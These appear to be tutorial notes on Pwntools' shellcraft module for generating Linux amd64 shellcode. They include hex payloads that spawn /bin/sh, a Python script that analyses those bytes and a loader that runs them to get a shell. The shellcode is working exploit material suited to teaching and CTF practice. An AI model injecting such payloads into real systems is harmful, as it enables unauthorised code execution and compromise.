SHELLCRAFT

This Pwntools module lets exploit developers quickly generate assembly code (shellcode) for common tasks without writing raw assembly by hand. It provides ready-made snippets for things like executing syscalls, spawning a shell, reading/writing files, or setting registers. The code can be output in multiple formats (assembly, raw bytes, or Python strings). It is architecture-aware and supports x86, x86-64, ARM, MIPS, and others. For example, shellcraft.sh() produces assembly for a simple execve("/bin/sh") shell, while shellcraft.cat("flag.txt") generates code to open, read, and print a file. Because it integrates tightly with Pwntools' assembler (asm), you can generate shellcode, assemble it, and inject it into an exploit in one flow. In short, shellcraft acts as a library of building blocks for custom payloads, making shellcode creation both faster and less error-prone.

COMPLETE X86_64 SYSCALL LIST

LISTING SYSCALLS

METHOD 1:

root@sre:~$ pwn shellcraft -l 'amd64.linux'
 ...SNIP...
 amd64.linux.sh

METHOD 2:

root@sre:~$ python3

>>> from pwn import *
>>> context(os="linux", arch="amd64", log_level="error")
>>> dir(shellcraft)

[...SNIP... 'execve', 'exit', 'exit_group', ... SNIP...]

SHELLCODE GENERATION: BASIC

root@sre:~$ pwn shellcraft amd64.linux.sh
 6a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05
 
 * this shellcode is not as optimized or as short as hand-written shellcode

SHELLCODE GENERATION: ADVANCED (VIA PYTHON)

This method uses the Python3 interpreter to fully unlock shellcraft's capabilities and use its advanced syscalls with arguments.

root@sre:~$ python3
 >>> from pwn import *
 >>> context(os="linux", arch="amd64", log_level="error")
 >>> dir(shellcraft)

 [...SNIP... 'execve', 'exit', 'exit_group', ... SNIP...]
 >>> syscall = shellcraft.execve(path='/bin/sh',argv=['/bin/sh']) # syscall and args

 >>> asm(syscall).hex()                                        # print shellcode
  '48b801010101010101015048b82e63686f2e726901483104244889e748b801010101010101015048b82e63686f2e7269014831042431f6566a085e4801e6564889e631d26a3b580f05'
 
 * dir(shellcraft) lists all the syscall wrappers and helpers available for the configured arch/os
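As an added example (not part of the original notes or of Pwntools itself), the script below takes the two hex strings printed above, the short amd64.linux.sh output and the longer execve output, and inspects them the way you would before reusing generated shellcode: it measures the length, scans for bytes that commonly break a payload (0x00 and 0x0a), and recovers the strings the code builds on the stack. It assumes the bytes shown on this page and only recognises the 8-byte "mov rax, imm64 ; push rax" forms, optionally followed by "mov rax, imm64 ; xor [rsp], rax"; the shorter push imm8/imm32 forms in the sh variant are left alone.

```python
import re
from typing import List

# Both hex strings are copied from the pwn/Python output shown on this page.
SHELLCRAFT_SH_HEX = (
    "6a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e"
    "4801e6564889e631d26a3b580f05"
)
SHELLCRAFT_EXECVE_HEX = (
    "48b801010101010101015048b82e63686f2e726901483104244889e748b80101010101"
    "0101015048b82e63686f2e7269014831042431f6566a085e4801e6564889e631d26a3b"
    "580f05"
)


def find_bad_bytes(shellcode: bytes, bad: bytes = b"\x00\x0a") -> List[int]:
    """Return the offsets of every byte from `bad` found in `shellcode`.

    A NUL terminates a C string copy and 0x0a ends a line read, so either one
    inside a payload usually means the payload will be truncated.
    """
    return [i for i, b in enumerate(shellcode) if b in bad]


# Two ways shellcraft lands an 8-byte chunk of a string on the stack:
#   masked: mov rax, MASK ; push rax ; mov rax, STR^MASK ; xor [rsp], rax
#   plain : mov rax, STR  ; push rax
# The masked branch is listed first so it wins when both could match.
STACK_STRING = re.compile(
    rb"\x48\xb8(?P<mask>.{8})\x50\x48\xb8(?P<masked>.{8})\x48\x31\x04\x24"
    rb"|\x48\xb8(?P<lit>.{8})\x50",
    re.DOTALL,
)


def recover_stack_strings(shellcode: bytes) -> List[bytes]:
    """Recover the 8-byte string chunks pushed by the patterns above.

    For the masked form the two immediates are XORed back together, which
    is exactly what the generated code does at run time with xor [rsp], rax.
    """
    chunks = []
    for m in STACK_STRING.finditer(shellcode):
        if m.group("mask") is not None:
            mask, masked = m.group("mask"), m.group("masked")
            chunks.append(bytes(a ^ b for a, b in zip(mask, masked)))
        else:
            chunks.append(m.group("lit"))
    return chunks


def summarize(hex_shellcode: str) -> dict:
    """Length, bad-byte offsets and recovered string chunks for one payload."""
    sc = bytes.fromhex(hex_shellcode)
    return {
        "length": len(sc),
        "bad_bytes": find_bad_bytes(sc),
        "strings": recover_stack_strings(sc),
    }


if __name__ == "__main__":
    for name, hx in (("sh", SHELLCRAFT_SH_HEX), ("execve", SHELLCRAFT_EXECVE_HEX)):
        print(name, summarize(hx))
```

The execve variant is 25 bytes longer than the sh variant because "/bin/sh\0" contains a NUL and shellcraft therefore pushes it XORed with 0x0101010101010101 and undoes the mask in place, twice (once for the path, once for argv[0]); the recovered chunks show the plaintext that only ever exists on the stack, which is also why a static string scan of the payload finds no "/bin/sh".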

RUNNING SHELLCODE (TESTING)

METHOD 1

root@sre:~$ pwn shellcraft amd64.linux.sh -r
 $ whoami
  root

METHOD 2

root@sre:~$ nano loader.py
 #!/usr/bin/python3

 import sys
 from pwn import *

 # must match the arch/os the shellcode was generated for
 context(os="linux", arch="amd64", log_level="error")

 # decode the hex shellcode given on the command line, map it into a fresh
 # process and attach an interactive session to it
 run_shellcode(unhex(sys.argv[1])).interactive()

root@sre:~$ python3 loader.py '48b801010101010101015048b82e63686f2e726901483104244889e748b801010101010101015048b82e63686f2e7269014831042431f6566a085e4801e6564889e631d26a3b580f05'
 $ whoami
    root
